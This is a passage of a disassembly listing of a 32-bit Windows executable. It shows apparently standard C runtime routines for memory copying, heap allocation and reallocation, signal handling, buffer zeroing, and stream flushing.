		rep movsb
		mov	eax, [ebp+arg_0]
		jmp	short loc_40DCF2
; ---------------------------------------------------------------------------

loc_40DC9F:				; CODE XREF: sub_40DC1C+37j
		cmp	ecx, edi
		jnz	short loc_40DCD8
		neg	ecx
		add	ecx, 10h
		mov	[ebp+var_1C], ecx
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+var_1C]
		rep movsb
		mov	ecx, [ebp+arg_0]
		add	ecx, [ebp+var_1C]
		mov	edx, [ebp+arg_4]
		add	edx, [ebp+var_1C]
		mov	eax, [ebp+arg_8]
		sub	eax, [ebp+var_1C]
		push	eax
		push	edx
		push	ecx
		call	sub_40DC1C
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]
		jmp	short loc_40DCF2
; ---------------------------------------------------------------------------

loc_40DCD8:				; CODE XREF: sub_40DC1C+85j
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_8]
		mov	edx, ecx
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		rep movsb
		mov	eax, [ebp+arg_0]

loc_40DCF2:				; CODE XREF: sub_40DC1C+5Dj
					; sub_40DC1C+81j ...
		mov	ebx, [ebp+var_4]
		mov	esi, [ebp+var_8]
		mov	edi, [ebp+var_C]
		mov	esp, ebp
		pop	ebp
		retn
sub_40DC1C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DCFF	proc near		; CODE XREF: sub_407B2A+Ep

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

; FUNCTION CHUNK AT 0040DE04 SIZE 00000019 BYTES

		push	0Ch
		push	offset dword_421AF0
		call	__SEH_prolog4
		mov	ecx, [ebp+arg_0]
		xor	edi, edi
		cmp	ecx, edi
		jbe	short loc_40DD42
		push	0FFFFFFE0h
		pop	eax
		xor	edx, edx
		div	ecx
		cmp	eax, [ebp+arg_4]
		sbb	eax, eax
		inc	eax
		jnz	short loc_40DD42
		call	sub_405B83
		mov	dword ptr [eax], 0Ch
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h

loc_40DD3B:				; CODE XREF: sub_40DCFF+E6j
					; sub_40DCFF+F2j
		xor	eax, eax
		jmp	loc_40DE17
; ---------------------------------------------------------------------------

loc_40DD42:				; CODE XREF: sub_40DCFF+13j
					; sub_40DCFF+22j
		imul	ecx, [ebp+arg_4]
		mov	esi, ecx
		mov	[ebp+arg_0], esi
		cmp	esi, edi
		jnz	short loc_40DD52
		xor	esi, esi
		inc	esi

loc_40DD52:				; CODE XREF: sub_40DCFF+4Ej
					; sub_40DCFF+DBj
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		cmp	esi, 0FFFFFFE0h
		ja	short loc_40DDC5
		cmp	dword_436454, 3
		jnz	short loc_40DDB0
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		mov	eax, [ebp+arg_0]
		cmp	eax, dword_436444
		ja	short loc_40DDB0
		push	4
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	[ebp+arg_0]
		call	sub_4066A9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40DDFB
		mov	ebx, [ebp+var_1C]
		cmp	ebx, edi
		jz	short loc_40DDB4
		push	[ebp+arg_0]
		push	edi
		push	ebx
		call	sub_407F20
		add	esp, 0Ch

loc_40DDB0:				; CODE XREF: sub_40DCFF+64j
					; sub_40DCFF+78j
		cmp	ebx, edi
		jnz	short loc_40DE15

loc_40DDB4:				; CODE XREF: sub_40DCFF+A2j
		push	esi
		push	8
		push	dword_4275A8
		call	ds:dword_41D110	; RtlAllocateHeap
		mov	ebx, eax

loc_40DDC5:				; CODE XREF: sub_40DCFF+5Bj
		cmp	ebx, edi
		jnz	short loc_40DE15
		cmp	dword_42792C, edi
		jz	short loc_40DE04
		push	esi
		call	sub_408412
		pop	ecx
		test	eax, eax
		jnz	loc_40DD52
		mov	eax, [ebp+arg_8]
		cmp	eax, edi
		jz	loc_40DD3B
		mov	dword ptr [eax], 0Ch
		jmp	loc_40DD3B
sub_40DCFF	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DDF6	proc near		; DATA XREF: _1fieagrn:00421B08o
		xor	edi, edi
		mov	esi, [ebp+0Ch]
sub_40DDF6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40DDFB	proc near		; CODE XREF: sub_40DCFF+98p
		push	4
		call	sub_405CCF
		pop	ecx
		retn
sub_40DDFB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40DCFF

loc_40DE04:				; CODE XREF: sub_40DCFF+D0j
		cmp	ebx, edi
		jnz	short loc_40DE15
		mov	eax, [ebp+arg_8]
		cmp	eax, edi
		jz	short loc_40DE15
		mov	dword ptr [eax], 0Ch

loc_40DE15:				; CODE XREF: sub_40DCFF+B3j
					; sub_40DCFF+C8j ...
		mov	eax, ebx

loc_40DE17:				; CODE XREF: sub_40DCFF+3Ej
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40DCFF

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DE1D	proc near		; CODE XREF: sub_407B72+Cp
					; sub_40E038+3Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0040DF6A SIZE 000000CE BYTES

		push	10h
		push	offset dword_421B10
		call	__SEH_prolog4
		mov	ebx, [ebp+arg_0]
		test	ebx, ebx
		jnz	short loc_40DE3E
		push	[ebp+arg_4]
		call	sub_403AA0
		pop	ecx
		jmp	loc_40E00A
; ---------------------------------------------------------------------------

loc_40DE3E:				; CODE XREF: sub_40DE1D+11j
		mov	esi, [ebp+arg_4]
		test	esi, esi
		jnz	short loc_40DE51
		push	ebx
		call	sub_4039C3
		pop	ecx
		jmp	loc_40E008
; ---------------------------------------------------------------------------

loc_40DE51:				; CODE XREF: sub_40DE1D+26j
		cmp	dword_436454, 3
		jnz	loc_40DFF1

loc_40DE5E:				; CODE XREF: sub_40DE1D+169j
		xor	edi, edi
		mov	[ebp+var_1C], edi
		cmp	esi, 0FFFFFFE0h
		ja	loc_40DFF6
		push	4
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	ebx
		call	sub_405ED5
		pop	ecx
		mov	[ebp+var_20], eax
		cmp	eax, edi
		jz	loc_40DF27
		cmp	esi, dword_436444
		ja	short loc_40DEDA
		push	esi
		push	ebx
		push	eax
		call	sub_4063CA
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40DEA5
		mov	[ebp+var_1C], ebx
		jmp	short loc_40DEDA
; ---------------------------------------------------------------------------

loc_40DEA5:				; CODE XREF: sub_40DE1D+81j
		push	esi
		call	sub_4066A9
		pop	ecx
		mov	[ebp+var_1C], eax
		cmp	eax, edi
		jz	short loc_40DEDA
		mov	eax, [ebx-4]
		dec	eax
		cmp	eax, esi
		jb	short loc_40DEBD
		mov	eax, esi

loc_40DEBD:				; CODE XREF: sub_40DE1D+9Cj
		push	eax
		push	ebx
		push	[ebp+var_1C]
		call	sub_407FA0
		push	ebx
		call	sub_405ED5
		mov	[ebp+var_20], eax
		push	ebx
		push	eax
		call	sub_405F00
		add	esp, 18h

loc_40DEDA:				; CODE XREF: sub_40DE1D+72j
					; sub_40DE1D+86j ...
		cmp	[ebp+var_1C], edi
		jnz	short loc_40DF27
		cmp	esi, edi
		jnz	short loc_40DEE9
		xor	esi, esi
		inc	esi
		mov	[ebp+arg_4], esi

loc_40DEE9:				; CODE XREF: sub_40DE1D+C4j
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		push	esi
		push	edi
		push	dword_4275A8
		call	ds:dword_41D110	; RtlAllocateHeap
		mov	[ebp+var_1C], eax
		cmp	eax, edi
		jz	short loc_40DF27
		mov	eax, [ebx-4]
		dec	eax
		cmp	eax, esi
		jb	short loc_40DF11
		mov	eax, esi

loc_40DF11:				; CODE XREF: sub_40DE1D+F0j
		push	eax
		push	ebx
		push	[ebp+var_1C]
		call	sub_407FA0
		push	ebx
		push	[ebp+var_20]
		call	sub_405F00
		add	esp, 14h

loc_40DF27:				; CODE XREF: sub_40DE1D+66j
					; sub_40DE1D+C0j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40DF61
		cmp	[ebp+var_20], 0
		jnz	short loc_40DF6A
		test	esi, esi
		jnz	short loc_40DF3E
		inc	esi

loc_40DF3E:				; CODE XREF: sub_40DE1D+11Ej
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		push	esi
		push	ebx
		push	0
		push	dword_4275A8
		call	ds:off_41D150
		mov	edi, eax
		jmp	short loc_40DF6D
sub_40DE1D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DF5B	proc near		; DATA XREF: _1fieagrn:00421B28o
		mov	esi, [ebp+0Ch]
		mov	ebx, [ebp+8]
sub_40DF5B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40DF61	proc near		; CODE XREF: sub_40DE1D+111p
		push	4
		call	sub_405CCF
		pop	ecx
		retn
sub_40DF61	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40DE1D

loc_40DF6A:				; CODE XREF: sub_40DE1D+11Aj
		mov	edi, [ebp+var_1C]

loc_40DF6D:				; CODE XREF: sub_40DE1D+13Cj
		test	edi, edi
		jnz	loc_40E034
		cmp	dword_42792C, edi
		jz	short loc_40DFA9
		push	esi
		call	sub_408412
		pop	ecx
		test	eax, eax
		jnz	loc_40DE5E
		call	sub_405B83
		cmp	[ebp+var_20], edi
		jnz	short loc_40E002

loc_40DF96:				; CODE XREF: sub_40DE1D+1F8j
		mov	esi, eax
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405B48
		pop	ecx
		mov	[esi], eax
		jmp	short loc_40E008
; ---------------------------------------------------------------------------

loc_40DFA9:				; CODE XREF: sub_40DE1D+15Ej
		test	edi, edi
		jnz	loc_40E034
		call	sub_405B83
		cmp	[ebp+var_20], edi
		jz	short loc_40E023
		mov	dword ptr [eax], 0Ch
		jmp	short loc_40E034
; ---------------------------------------------------------------------------

loc_40DFC3:				; CODE XREF: sub_40DE1D+1D7j
		test	esi, esi
		jnz	short loc_40DFC8
		inc	esi

loc_40DFC8:				; CODE XREF: sub_40DE1D+1A8j
		push	esi
		push	ebx
		push	0
		push	dword_4275A8
		call	ds:off_41D150
		mov	edi, eax
		test	edi, edi
		jnz	short loc_40E034
		cmp	dword_42792C, eax
		jz	short loc_40E01A
		push	esi
		call	sub_408412
		pop	ecx
		test	eax, eax
		jz	short loc_40E010

loc_40DFF1:				; CODE XREF: sub_40DE1D+3Bj
		cmp	esi, 0FFFFFFE0h
		jbe	short loc_40DFC3

loc_40DFF6:				; CODE XREF: sub_40DE1D+49j
		push	esi
		call	sub_408412
		pop	ecx
		call	sub_405B83

loc_40E002:				; CODE XREF: sub_40DE1D+177j
		mov	dword ptr [eax], 0Ch

loc_40E008:				; CODE XREF: sub_40DE1D+2Fj
					; sub_40DE1D+18Aj
		xor	eax, eax

loc_40E00A:				; CODE XREF: sub_40DE1D+1Cj
					; sub_40DE1D+219j
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_40E010:				; CODE XREF: sub_40DE1D+1D2j
		call	sub_405B83
		jmp	loc_40DF96
; ---------------------------------------------------------------------------

loc_40E01A:				; CODE XREF: sub_40DE1D+1C7j
		test	edi, edi
		jnz	short loc_40E034
		call	sub_405B83

loc_40E023:				; CODE XREF: sub_40DE1D+19Cj
		mov	esi, eax
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405B48
		mov	[esi], eax
		pop	ecx

loc_40E034:				; CODE XREF: sub_40DE1D+152j
					; sub_40DE1D+18Ej ...
		mov	eax, edi
		jmp	short loc_40E00A
; END OF FUNCTION CHUNK	FOR sub_40DE1D

; =============== S U B	R O U T	I N E =======================================



sub_40E038	proc near		; CODE XREF: sub_407BBD+10p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_4]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jbe	short loc_40E06C
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	ecx
		cmp	eax, [esp+4+arg_8]
		jnb	short loc_40E06C
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 0Ch
		call	sub_4032F9
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40E06C:				; CODE XREF: sub_40E038+9j
					; sub_40E038+16j
		imul	ecx, [esp+4+arg_8]
		push	ecx
		push	[esp+8+arg_0]
		call	sub_40DE1D
		pop	ecx
		pop	ecx
		pop	esi
		retn
sub_40E038	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E07F	proc near		; CODE XREF: sub_407EC9+27p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_427A64, eax
		mov	dword_427A68, eax
		mov	dword_427A6C, eax
		mov	dword_427A70, eax
		retn
sub_40E07F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E098	proc near		; CODE XREF: sub_40E0D9+5Ap

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, dword_423E44
		push	esi

loc_40E0A3:				; CODE XREF: sub_40E098+1Ej
		cmp	[eax+4], edx
		jz	short loc_40E0B8
		mov	esi, ecx
		imul	esi, 0Ch
		add	esi, [esp+4+arg_0]
		add	eax, 0Ch
		cmp	eax, esi
		jb	short loc_40E0A3

loc_40E0B8:				; CODE XREF: sub_40E098+Ej
		imul	ecx, 0Ch
		add	ecx, [esp+4+arg_0]
		pop	esi
		cmp	eax, ecx
		jnb	short loc_40E0C9
		cmp	[eax+4], edx
		jz	short locret_40E0CB

loc_40E0C9:				; CODE XREF: sub_40E098+2Aj
		xor	eax, eax

locret_40E0CB:				; CODE XREF: sub_40E098+2Fj
		retn
sub_40E098	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E0CC	proc near		; CODE XREF: sub_41056E:loc_41059Bp
		push	dword_427A6C
		call	sub_405543
		pop	ecx
		retn
sub_40E0CC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E0D9	proc near		; CODE XREF: sub_41056E+38p

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0040E283 SIZE 00000006 BYTES

		push	20h
		push	offset dword_421B30
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		mov	[ebp+var_28], edi
		mov	ebx, [ebp+arg_0]
		cmp	ebx, 0Bh
		jg	short loc_40E141
		jz	short loc_40E10C
		mov	eax, ebx
		push	2
		pop	ecx
		sub	eax, ecx
		jz	short loc_40E122
		sub	eax, ecx
		jz	short loc_40E10C
		sub	eax, ecx
		jz	short loc_40E16C
		sub	eax, ecx
		jnz	short loc_40E150

loc_40E10C:				; CODE XREF: sub_40E0D9+1Cj
					; sub_40E0D9+29j
		call	sub_4056CA
		mov	edi, eax
		mov	[ebp+var_28], edi
		test	edi, edi
		jnz	short loc_40E12E

loc_40E11A:				; CODE XREF: sub_40E0D9+91j
		or	eax, 0FFFFFFFFh
		jmp	loc_40E283
; ---------------------------------------------------------------------------

loc_40E122:				; CODE XREF: sub_40E0D9+25j
		mov	esi, offset dword_427A64
		mov	eax, dword_427A64
		jmp	short loc_40E18E
; ---------------------------------------------------------------------------

loc_40E12E:				; CODE XREF: sub_40E0D9+3Fj
		push	dword ptr [edi+5Ch]
		mov	edx, ebx
		call	sub_40E098
		mov	esi, eax
		add	esi, 8
		mov	eax, [esi]
		jmp	short loc_40E19B
; ---------------------------------------------------------------------------

loc_40E141:				; CODE XREF: sub_40E0D9+1Aj
		mov	eax, ebx
		sub	eax, 0Fh
		jz	short loc_40E184
		sub	eax, 6
		jz	short loc_40E178
		dec	eax
		jz	short loc_40E16C

loc_40E150:				; CODE XREF: sub_40E0D9+31j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_40E11A
; ---------------------------------------------------------------------------

loc_40E16C:				; CODE XREF: sub_40E0D9+2Dj
					; sub_40E0D9+75j
		mov	esi, offset dword_427A6C
		mov	eax, dword_427A6C
		jmp	short loc_40E18E
; ---------------------------------------------------------------------------

loc_40E178:				; CODE XREF: sub_40E0D9+72j
		mov	esi, offset dword_427A68
		mov	eax, dword_427A68
		jmp	short loc_40E18E
; ---------------------------------------------------------------------------

loc_40E184:				; CODE XREF: sub_40E0D9+6Dj
		mov	esi, offset dword_427A70
		mov	eax, dword_427A70

loc_40E18E:				; CODE XREF: sub_40E0D9+53j
					; sub_40E0D9+9Dj ...
		mov	[ebp+var_1C], 1
		push	eax
		call	sub_405543

loc_40E19B:				; CODE XREF: sub_40E0D9+66j
		mov	[ebp+var_20], eax
		pop	ecx
		xor	eax, eax
		cmp	[ebp+var_20], 1
		jz	loc_40E283
		cmp	[ebp+var_20], eax
		jnz	short loc_40E1B7
		push	3
		call	sub_407E9A

loc_40E1B7:				; CODE XREF: sub_40E0D9+D5j
		cmp	[ebp+var_1C], eax
		jz	short loc_40E1C3
		push	eax
		call	sub_405DA7
		pop	ecx

loc_40E1C3:				; CODE XREF: sub_40E0D9+E1j
		xor	eax, eax
		mov	[ebp+ms_exc.disabled], eax
		cmp	ebx, 8
		jz	short loc_40E1D7
		cmp	ebx, 0Bh
		jz	short loc_40E1D7
		cmp	ebx, 4
		jnz	short loc_40E1F2

loc_40E1D7:				; CODE XREF: sub_40E0D9+F2j
					; sub_40E0D9+F7j
		mov	ecx, [edi+60h]
		mov	[ebp+var_2C], ecx
		mov	[edi+60h], eax
		cmp	ebx, 8
		jnz	short loc_40E225
		mov	ecx, [edi+64h]
		mov	[ebp+var_30], ecx
		mov	dword ptr [edi+64h], 8Ch

loc_40E1F2:				; CODE XREF: sub_40E0D9+FCj
		cmp	ebx, 8
		jnz	short loc_40E225
		mov	ecx, dword_423E38
		mov	[ebp+var_24], ecx

loc_40E200:				; CODE XREF: sub_40E0D9+14Aj
		mov	ecx, dword_423E3C
		mov	edx, dword_423E38
		add	ecx, edx
		cmp	[ebp+var_24], ecx
		jge	short loc_40E22C
		mov	ecx, [ebp+var_24]
		imul	ecx, 0Ch
		mov	edx, [edi+5Ch]
		mov	[ecx+edx+8], eax
		inc	[ebp+var_24]
		jmp	short loc_40E200
; ---------------------------------------------------------------------------

loc_40E225:				; CODE XREF: sub_40E0D9+10Aj
					; sub_40E0D9+11Cj
		call	sub_40553A
		mov	[esi], eax

loc_40E22C:				; CODE XREF: sub_40E0D9+138j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E24D
		cmp	ebx, 8
		jnz	short sub_40E25C
		push	dword ptr [edi+64h]
		push	ebx
		call	[ebp+var_20]
		pop	ecx
		jmp	short loc_40E260
sub_40E0D9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E247	proc near		; DATA XREF: _1fieagrn:00421B48o
		mov	ebx, [ebp+8]
		mov	edi, [ebp-28h]
sub_40E247	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E24D	proc near		; CODE XREF: sub_40E0D9+15Ap
		cmp	dword ptr [ebp-1Ch], 0
		jz	short locret_40E25B
		push	0
		call	sub_405CCF
		pop	ecx

locret_40E25B:				; CODE XREF: sub_40E24D+4j
		retn
sub_40E24D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E25C	proc near		; CODE XREF: sub_40E0D9+162j
		push	ebx
		call	dword ptr [ebp-20h]

loc_40E260:				; CODE XREF: sub_40E0D9+16Cj
		pop	ecx
		cmp	ebx, 8
		jz	short loc_40E270
		cmp	ebx, 0Bh
		jz	short loc_40E270
		cmp	ebx, 4
		jnz	short loc_40E281

loc_40E270:				; CODE XREF: sub_40E25C+8j
					; sub_40E25C+Dj
		mov	eax, [ebp-2Ch]
		mov	[edi+60h], eax
		cmp	ebx, 8
		jnz	short loc_40E281
		mov	eax, [ebp-30h]
		mov	[edi+64h], eax

loc_40E281:				; CODE XREF: sub_40E25C+12j
					; sub_40E25C+1Dj
		xor	eax, eax
sub_40E25C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_40E0D9

loc_40E283:				; CODE XREF: sub_40E0D9+44j
					; sub_40E0D9+CCj
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40E0D9

; =============== S U B	R O U T	I N E =======================================



sub_40E289	proc near		; CODE XREF: sub_407EC9+21p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_427A78, eax
		retn
sub_40E289	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E293	proc near		; CODE XREF: sub_407EC9+1Bp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_427A84, eax
		retn
sub_40E293	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E29D	proc near		; CODE XREF: sub_40E2F4+31p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		mov	[ebp+var_4], edi
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_4]
		shr	ecx, 7
		pxor	xmm0, xmm0
		jmp	short loc_40E2BD
; ---------------------------------------------------------------------------
		db 8Dh,	0A4h, 24h, 4 dup(0)
		db 90h
; ---------------------------------------------------------------------------

loc_40E2BD:				; CODE XREF: sub_40E29D+16j
					; sub_40E29D+4Ej
		movdqa	oword ptr [edi], xmm0
		movdqa	oword ptr [edi+10h], xmm0
		movdqa	oword ptr [edi+20h], xmm0
		movdqa	oword ptr [edi+30h], xmm0
		movdqa	oword ptr [edi+40h], xmm0
		movdqa	oword ptr [edi+50h], xmm0
		movdqa	oword ptr [edi+60h], xmm0
		movdqa	oword ptr [edi+70h], xmm0
		lea	edi, [edi+80h]
		dec	ecx
		jnz	short loc_40E2BD
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40E29D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E2F4	proc near		; CODE XREF: sub_407F20+27j
					; sub_40E2F4+7Dp

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	[ebp+var_4], edi
		mov	eax, [ebp+arg_0]
		cdq
		mov	edi, eax
		xor	edi, edx
		sub	edi, edx
		and	edi, 0Fh
		xor	edi, edx
		sub	edi, edx
		test	edi, edi
		jnz	short loc_40E34E
		mov	ecx, [ebp+arg_8]
		mov	edx, ecx
		and	edx, 7Fh
		mov	[ebp+var_C], edx
		cmp	ecx, edx
		jz	short loc_40E333
		sub	ecx, edx
		push	ecx
		push	eax
		call	sub_40E29D
		add	esp, 8
		mov	eax, [ebp+arg_0]
		mov	edx, [ebp+var_C]

loc_40E333:				; CODE XREF: sub_40E2F4+2Bj
		test	edx, edx
		jz	short loc_40E37C
		add	eax, [ebp+arg_8]
		sub	eax, edx
		mov	[ebp+var_8], eax
		xor	eax, eax
		mov	edi, [ebp+var_8]
		mov	ecx, [ebp+var_C]
		rep stosb
		mov	eax, [ebp+arg_0]
		jmp	short loc_40E37C
; ---------------------------------------------------------------------------

loc_40E34E:				; CODE XREF: sub_40E2F4+1Cj
		neg	edi
		add	edi, 10h
		mov	[ebp+var_10], edi
		xor	eax, eax
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+var_10]
		rep stosb
		mov	eax, [ebp+var_10]
		mov	ecx, [ebp+arg_0]
		mov	edx, [ebp+arg_8]
		add	ecx, eax
		sub	edx, eax
		push	edx
		push	0
		push	ecx
		call	sub_40E2F4
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]

loc_40E37C:				; CODE XREF: sub_40E2F4+41j
					; sub_40E2F4+58j
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40E2F4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E383	proc near		; CODE XREF: sub_4084EB+Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	10h
		push	offset dword_421B50
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		push	1
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		push	3
		pop	edi

loc_40E3A2:				; CODE XREF: sub_40E383+7Fj
		mov	[ebp+var_20], edi
		cmp	edi, dword_436420
		jge	short loc_40E404
		mov	esi, edi
		shl	esi, 2
		mov	eax, dword_435400
		add	eax, esi
		cmp	[eax], ebx
		jz	short loc_40E401
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_40E3D4
		push	eax
		call	sub_403884
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40E3D4
		inc	[ebp+var_1C]

loc_40E3D4:				; CODE XREF: sub_40E383+40j
					; sub_40E383+4Cj
		cmp	edi, 14h
		jl	short loc_40E401
		mov	eax, dword_435400
		mov	eax, [esi+eax]
		add	eax, 20h
		push	eax
		call	ds:off_41D16C
		mov	eax, dword_435400
		push	dword ptr [esi+eax]
		call	sub_4039C3
		pop	ecx
		mov	eax, dword_435400
		mov	[esi+eax], ebx

loc_40E401:				; CODE XREF: sub_40E383+38j
					; sub_40E383+54j
		inc	edi
		jmp	short loc_40E3A2
; ---------------------------------------------------------------------------

loc_40E404:				; CODE XREF: sub_40E383+28j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E419
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40E383	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E419	proc near		; CODE XREF: sub_40E383+88p
					; DATA XREF: _1fieagrn:00421B68o
		push	1
		call	sub_405CCF
		pop	ecx
		retn
sub_40E419	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E422	proc near		; CODE XREF: sub_40EA60+72p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
var_3		= byte ptr -3
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		push	esi
		xor	ebx, ebx
		test	byte ptr [ebp+arg_8], 80h
		push	edi
		push	10h
		mov	esi, eax
		mov	[ebp+var_14], ebx
		mov	[ebp+var_18], ebx
		mov	[ebp+var_2], bl
		mov	[ebp+var_28], 0Ch
		mov	[ebp+var_24], ebx
		pop	edi
		jz	short loc_40E454
		mov	[ebp+var_20], ebx
		mov	[ebp+var_1], 10h
		jmp	short loc_40E45E
; ---------------------------------------------------------------------------

loc_40E454:				; CODE XREF: sub_40E422+27j
		mov	[ebp+var_20], 1
		mov	[ebp+var_1], bl

loc_40E45E:				; CODE XREF: sub_40E422+30j
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_410C39
		test	eax, eax
		pop	ecx
		jz	short loc_40E479
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4031FD
		add	esp, 14h

loc_40E479:				; CODE XREF: sub_40E422+48j
		lea	eax, [ebp+var_18]
		push	eax
		call	sub_407CB6
		test	eax, eax
		pop	ecx
		jz	short loc_40E494
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4031FD
		add	esp, 14h

loc_40E494:				; CODE XREF: sub_40E422+63j
		mov	eax, 8000h
		test	[ebp+arg_8], eax
		jnz	short loc_40E4B0
		test	[ebp+arg_8], 74000h
		jnz	short loc_40E4AC
		cmp	[ebp+var_14], eax
		jz	short loc_40E4B0

loc_40E4AC:				; CODE XREF: sub_40E422+83j
		or	[ebp+var_1], 80h

loc_40E4B0:				; CODE XREF: sub_40E422+7Aj
					; sub_40E422+88j
		mov	eax, [ebp+arg_8]
		push	3
		pop	edx
		and	eax, edx
		sub	eax, ebx
		mov	ecx, 80000000h
		jz	short loc_40E4FF
		dec	eax
		jz	short loc_40E4F6
		dec	eax
		jz	short loc_40E4ED

loc_40E4C7:				; CODE XREF: sub_40E422+F6j
					; sub_40E422+14Fj ...
		call	sub_405B96
		mov	[eax], ebx
